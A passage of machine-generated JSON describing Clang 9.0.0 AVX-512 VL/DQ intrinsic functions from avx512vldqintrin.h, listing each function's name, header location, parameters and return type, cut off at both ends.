"tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvtpd_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:319:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_cvtpd_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:326:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtpd_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:333:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtpd_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:340:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_cvtpd_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:347:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_cvtpd_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:354:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvtpd_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:361:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_cvtps_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:368:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtps_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:375:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtps_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:382:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_cvtps_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:389:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_cvtps_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:396:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvtps_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:403:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_cvtps_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:410:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtps_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:417:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtps_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:424:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_cvtps_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:431:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_cvtps_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:438:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvtps_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:445:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_cvtepi64_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:452:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask_cvtepi64_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:457:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_cvtepi64_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:464:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_cvtepi64_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:471:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_mask_cvtepi64_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:476:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_cvtepi64_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:483:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_cvtepi64_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:490:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_cvtepi64_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:497:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_cvtepi64_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:504:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_cvtepi64_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:511:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_cvtepi64_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:516:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_maskz_cvtepi64_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:523:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cvttpd_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:530:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvttpd_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:537:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvttpd_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:544:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_cvttpd_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:551:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_cvttpd_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:558:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvttpd_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:565:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_cvttpd_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:572:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvttpd_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:579:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvttpd_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:586:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_cvttpd_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:593:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_cvttpd_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:600:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvttpd_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:607:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_cvttps_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:614:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvttps_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:621:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvttps_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:628:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_cvttps_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:635:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_cvttps_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:642:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvttps_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:649:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_cvttps_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:656:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvttps_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:663:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvttps_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:670:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_cvttps_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:677:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_cvttps_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:684:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvttps_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:691:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_cvtepu64_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:698:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask_cvtepu64_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:703:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_cvtepu64_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:710:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_cvtepu64_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:717:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_mask_cvtepu64_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:722:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_cvtepu64_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:729:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_cvtepu64_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:736:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_cvtepu64_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:743:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_cvtepu64_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:750:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_cvtepu64_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:757:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_cvtepu64_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:762:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_maskz_cvtepu64_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:769:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_movepi32_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:906:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm256_movepi32_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:912:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm_movm_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:918:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_movm_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:924:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_movm_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:930:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_movm_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:936:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_movepi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:942:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm256_movepi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:948:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm256_broadcast_f32x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:954:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_mask_broadcast_f32x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:961:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_broadcast_f32x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:969:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_broadcast_f64x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:977:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_mask_broadcast_f64x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:984:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_broadcast_f64x2", "ns": 0, "location": 